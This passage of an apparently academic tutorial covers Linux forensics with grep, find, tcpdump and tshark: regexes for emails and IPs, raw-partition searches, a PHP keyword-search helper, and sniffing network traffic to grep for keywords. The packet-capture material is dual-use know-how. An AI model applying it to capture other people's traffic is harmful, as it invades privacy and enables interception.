&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
grep -P &quot;^.{6,30}Exif&quot; ./ &lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;FTK and EnCase do not contain the capability to sort images based on  this determinant.XXXII &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Assuming a series of files are found pertinent to a given crime or  circumstance, this may lend investigators the cause to search for and  seize digital equipment not specified or justified in an initial search  warrant.XXXIII &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The following expression matches a large number of email  addressesXXXIV: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A sample of grabbing an IP address with pertinent limitations: XXXV&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;An alternative form of this without the limitations of each octet  ranging from 0-255, decimal, might be found in the following:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This would match IP addresses, but not have the added benefit of weeding  out IP addresses like 400.600.800.900, which are impossible.  Also, the  &amp;amp;#039;\b&amp;amp;#039; word boundaries will not work if there is a  larger string within which an apparent IP was found.  E.g.  123.456.78.9.123.456.78.  It will match on this; one solution would be  to do something like this:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;grep -rP “[^\d\.]\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}[^\d\.]” ./*&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The following grep search uses the /dev/ entry and treats the entire  device (in my case a partition on a USB disk) similarly to that of a  single file.  Thus, such could be utilized to comb through either  deleted files or file slack:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;sudo grep -abP &quot;hiddendata\!&quot; /dev/sdb3&lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The -b switch will print out a byte offset.  In this case it&amp;amp;#039;s  very useful to have being as its a whole partition to sort through.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This grep search was somewhat problematic on account of a possible bug  with the -P switch, labeled as “experimental” in the man page of  grep.XXXVI It serves as an example of the caution needed when testing  expressions.&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;grep -P “baked(?!beans)” ./wordlist&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;To solve this issue, any of the following worked:XXXVII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
grep -P “baked” ./wordlist | grep -v “bakedbeans”&lt;br /&gt;
grep -P &amp;amp;#039;baked(?!beans)&amp;amp;#039; ./wordlist&lt;br /&gt;
x=&amp;amp;#039;!beans&amp;amp;#039;; grep -P &quot;baked(?${x})&quot; ./wordlist &lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Keyword searches:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Regular expressions in any given case need to be flexibly adapted to  fit the needs of the investigation at hand.XXXVIII  An example keyword  search might be as follows:XXXIX &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;grep -Pr  &quot;(torrent)|(h33t)|(tpb)|(thepiratebay)|(demonoid)|(mininova)|(waffles)|(what\.cd)&quot;  ./&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This might be an example of a search conducted on an individual  suspected of software piracy.  The search terms, separated by  alternations (the pipe &amp;amp;#039;|&amp;amp;#039; symbol), are names of  common keywords pertaining to torrents, common file sharing tools  notably not illegal in and of themselves, but commonly abused avenue for  the sharing of illicit warez.  The keywords can and should be adjusted  pending the circumstances of the case.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The most will be said by far about this sort of pattern, as it is both  powerful and flexible.  The basic idea is to separate desired patterns  in between alternations, so a match of any result will be seen.  There  is no feasible limit to the number of terms that may be searched for.   In the effort to provide a means for the quicker development of searches  using a large number of keywords, here is the source of a small php  script designed to be run from the command line to hopefully facilitate  the process:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;&amp;lt;?php &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $file=&quot;$argv[1]&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $fh=fopen($file,&amp;amp;#039;r&amp;amp;#039;); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $data=fread($fh,filesize($file)); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $changed=str_replace(&quot;,&quot;,&quot;|&quot;, $data); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $changed=str_replace(&quot;\n&quot;,&quot;&quot;,$changed); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $changed=&quot;\&quot;&quot;.$changed.&quot;\&quot;&quot;.&quot; &quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $changed=str_replace(&quot;.&quot;,&quot;\.&quot;,$changed); &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $location=$argv[2]; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $grepstring=&quot;grep -Prnb &quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; $g_query=$grepstring.$changed.$location; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; if($argv[3] != NULL) &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;\n&quot;.$g_query.&quot; &amp;gt; $argv[3]&quot;; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; else &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; echo &quot;\n&quot;.$g_query; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; ?&amp;gt; &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Where the basic syntax is “[scriptname.php] [inputfile] [searchlocation]  [outputfile]”.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Consider this example: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;php myscript.php input / outputfile.&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This would run the script &amp;amp;#039;myscript.php&amp;amp;#039;, using  &amp;amp;#039;input&amp;amp;#039; as the input file, searching through the  directory &amp;amp;#039;/&amp;amp;#039;, and using output as the output file for  redirection.  The actual output of the script would be as follows: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;grep -Pr  &quot;torrent|h33t|tpb|thepiratebay|demonoid|mininova|waffles|what\.cd&quot; /  &amp;gt; outputfile&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;For the input file, simply make a comma-separated file of the keywords.   This sort of script is simple, and not perfect, but it works for  reducing the workload on large or frequently used keyword-search type  grepping.  It should be mentioned that grep without the -P switch can do  this with a newline-separated file, specified with the -f switch.  The  Perl syntax (-P switch) doesn&amp;amp;#039;t allow for this, however,  necessitating the php script to shorten.XL This was tested on sets of  input keywords as large as 1411 different alternations.  Regarding the  speed differences between a search of 1411 alternations and one with  many fewer, the speed differences were 0.0086250 seconds per alternation  for a search with some ten alternations, and .004123317 seconds per  alternation with a search with 1411 alternations.XLI  While speed  concerns are not a primary aspect of this paper, these preliminary  benchmarks seem to indicate grep&amp;amp;#039;s efficiency in handling large  numbers of alternations.XLII The script could also append to a log-file  of grep expressions.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;It is not ideal, much could be added and changed.XLIII  More special  characters could be escaped in the same way that the  &amp;amp;#039;.&amp;amp;#039; character is already.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Grep and Packet Sniffing:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Grep with redirection (recall the discussion of standard streams) can  be useful for several applications.  The first reason, that has already  been mentioned, is that the &amp;amp;#039;&amp;gt;&amp;amp;#039; character can be  appended to a grep command to write the output to a file.  The  &amp;amp;#039;&amp;gt;&amp;gt;&amp;amp;#039; character can be used to append a later  search onto the end of an earlier one.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Another viable use of grep could be to combine packet sniffing with a  grep of the data.  The command tcpdump is a tool also commonly found by  default with Linux systems—no additional software is typically  required—and this tool lets a user elevated privileges (typically) put  an interface into promiscuous mode, looking at all of the traffic as  opposed to only the traffic that is destined for the host.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Detailed information on tcpdump can be found on the man pages.  Here is  an example that will sniff payload data and write the the data to a  file (called “data”):&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; sudo tcpdump -vvv -s0 -wdata &lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The &amp;amp;#039;-vvv&amp;amp;#039; switch controls the level of verbosity.  On  a typical DSL line running at 1.5 Mbps, the traffic generated by even a  very short session of sniffing can often reach many thousands of  packets (by very short I mean a few seconds).  After dumping an adequate  amount of traffic, Ctrl-C will stop the sniffing and return you to the  prompt.  Grep can then be used for searching through the captured data,  as follows: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;grep -aP &quot;how.to.kill&quot; ./data&lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The -a switch here is used to tell grep to treat the file as text, and  print out matching lines.  Data captured in this way is frequently  marked as binary data, in which case grep will not print out matching  lines by default.  The pattern might be used in an instance wherein a  person has been suspected of plotting a crime (likely murder or an  analogous crime in this case).  This is quite rudimentary and only  should be used as an example; a real case should account for  permutations and synonyms of search keywords.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The method has significant limitations, the primary one being that  tcpdump merely dumps data, it does not have built-in functionality to  decode data.  Examining tcpdump&amp;amp;#039;s output will reveal data  passed from source to destination and vice versa without any concern for  whether or not such a format is in human-readable form.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Probably the most desired traffic is going to be web traffic—oftentimes  traffic is left essentially out in the open for easy sniffing, often  even with somewhat sensitive information being passed.XLIV  The headers  can reveal whether or not traffic destined from a given destination will  be privy to easy observation via the use of tcpdump or not.  Take the  following two examples:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Encoded data:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;HTTP/1.1 200 OK..Cache-Control: private, max-age=0..Date: Fri, 19 Feb  2010 05:12:16 GMT..Expires: -1..Content-Type: text/html;  charset=UTF-8..Set-Cookie: SS=Q0=bmlnZw; path=/search..Server:  gws..Transfer-Encoding: chunked..Content-Encoding: gzip&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This was generated with a client that attempted a google search.  Google  gzips traffic, so searching for plaintext keywords in a grep will be  fruitless for the payload of HTTP packets.  Presumably this is done to  save bandwidth from unnecessary traffic.  Contrast such with the output  of this header:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Non-encoded:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;HTTP/1.1 200 OK..Date: Fri, 19 Feb 2010 05:11:39 GMT..Server:  Apache/2.2.10 (Fedora)..Last-Modified: Thu, 18 Feb 2010 14:12:47  GMT..ETag: &quot;4c07c-213-47fe08fb135c0&quot;..Accept-Ranges:  bytes..Content-Length: 531..Connection: close..Content-Type: text/html; &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This would be an example of traffic to a site that does not employ  gzipped encoding.  The use of tcpdump with such a site would suffice.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;It is important to note that gzipped encoding is not synonymous with  encryption—tcpdump simply lacks the capability of dumping traffic in a  form other than that which is passed along the wire.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;If decoding traffic is necessary, tshark, the command-line counterpart  to Wireshark, is a viable alternative.  The following form of the  command dumps fully decoded packets to the file “data2”:XLV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; sudo tshark -V -s0 &amp;gt; data2&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Wherein searches would be performed against the  &amp;amp;#039;data2&amp;amp;#039; file.  To users familiar with grep this can be  significantly more effective than using Wireshark to accomplish the  same thing.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;To reiterate the point concerning gzipped encoding, tcpdump suffices  when circumstances do not require dumping the full contents of packets.   When full packets are required—e.g. to rebuild what a suspect was  basically presented with at a given page—tshark is a much better  choice.XLVI Tshark is also preferable to tcpdump for grepping network  traffic for aforementioned reasons.  Though neither will pick up  encrypted traffic, tshark is able to decompress encoded traffic,  allowing the use of grep.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;In instances where web traffic is desired, often the desired output  will be located in a section “Line-based text data: text/html,” so using  grep is not necessarily mandatory, but the -b switch with a quick grep  search may be helpful in locating which section of the file deserves  examination.  Another method to cull data would be to specify a capture  filter, such as “-f “port 80””.XLVII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;It&amp;amp;#039;s left as an open question as to the specific instances  wherein network forensics may come into play.  Often, since warrants are  served on crimes long since committed, it&amp;amp;#039;s likely that an  investigator wouldn&amp;amp;#039;t need to sniff data off the wire  whatsoever.  It is a useful tool regardless, if not for the average  investigator, then for the systems and network administrators.XLVIII&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;The Find command:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The find program can be used to search for specific types of files.   The following searches for SQLite files (as identified with their common  extension):&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;find /home/ -name “*.sqlite”&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SQLite files can often contain forensically pertinent information; one  notable mention is that Firefox stores a treasure trove of information  in SQLite databases.  Some of this information includes downloads, form  history, bookmarks and browsing history.  By default this is stored  under the .mozilla folder in the user&amp;amp;#039;s home directory. The dot  signifies that it&amp;amp;#039;s hidden, it won&amp;amp;#039;t show up to a ls  unless the the -a switch is applied to ls when looking at a home  directory through a live shell.XLIX  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The following is a more complex example of find&amp;amp;#039;s  capabilities. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
find /home/ -type f -mtime -1 -name &quot;*.exe&quot; &lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;In turn, the switches dictate to print those files (type f) modified  (the &amp;amp;#039;m&amp;amp;#039; in &amp;amp;#039;mtime&amp;amp;#039;) up to a day ago  (-1) whose name ends in “.exe”.  On a side note, files with .exe  extensions are a rarity on Linux filesystems, and may even be a cause  for suspicion in some instances.  They are, however, becoming more  common with the popularity of wine.L&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Here is another advanced form of find:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;find . -name &quot;*.png&quot; -exec grep -lPa &quot;^\x89\x50\x4E\x47\x0D\0A\x1A\x0A&quot;  {} \;&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This time find is working on finding files in the current working  directory with the apparent extension of “.png” and grep is testing to  see if the files have .png file signatures.LI LII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;One of the main advantages to using find is the easy of searching  through additional levels of data such as file names.LIII  The following  command finds files with an apparent extension of .jpg in the /home  directory:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; find /home/ -name &quot;*.jpg&quot; &lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This search is recursive by default.  Notice that in this case, the “.”  symbol should be taken literally and not as a regex token for any  character.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
